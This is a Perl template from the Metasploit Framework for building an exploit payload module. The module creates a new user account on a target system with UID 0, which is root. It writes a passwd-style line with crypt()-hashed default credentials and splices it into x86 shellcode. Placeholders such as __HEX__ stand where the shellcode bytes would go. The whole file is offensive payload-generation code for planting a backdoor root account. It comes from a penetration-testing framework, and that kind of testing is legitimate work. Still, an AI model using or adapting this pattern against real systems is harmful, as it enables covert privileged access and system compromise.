##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Payload::__NAME__;
use strict;
use base 'Msf::PayloadComponent::NoConnection';
use Pex::x86;

my $info =
{
  'Name'         => '__SHORTNAME__',
  'Version'      => '$Revision: 1513 $',
  'Description'  => '__DESCRIPTION__',
  'Authors'      => [ __AUTHORS__ ],
  'Arch'         => [ '__ARCH__' ],
  'Priv'         => 1,
  'OS'           => [ '__OS__' ],
  'Size'         => '',
  'UserOpts'     =>
   {
      'USER'  => [1, 'DATA', 'The username to create',     'metasploit'],
      'PASS'  => [1, 'DATA', 'The password for this user', 'metasploit'],
      'SHELL' => [0, 'DATA', 'The shell for this user',    '/bin/sh'],
   },
};

sub new {
  my $class = shift;
  my $hash = @_ ? shift : { };
  $hash = $class->MergeHashRec($hash, {'Info' => $info});
  my $self = $class->SUPER::new($hash, @_);

  $self->_Info->{'Size'} = $self->_GenSize;
  return($self);
}

sub Build {
  my $self = shift;
  return($self->Generate());
}

sub Generate {
  my $self = shift;
  my $user = $self->GetVar('USER') || 'metasploit';
  my $pass = $self->GetVar('PASS');
  my $shell = $self->GetVar('SHELL') || '/bin/sh';
  my $str = $user . ":" . crypt($pass, "AA") . ":0:0::/:" . $shell . "\n";

  my $shellcode =
__HEX__;

  my $front = substr($shellcode, 0, __CUSTOM1__);
  my $back  = substr($shellcode, __CUSTOM2__, length($shellcode) - __CUSTOM2__);

  $shellcode = $front . 
    Pex::x86::call(length($str)) .
    $str .
    $back;
  
  return($shellcode);
}

sub _GenSize {
  my $self = shift;
  my $bin = $self->Generate('');
  return(length($bin));
}

__DISASM__

1;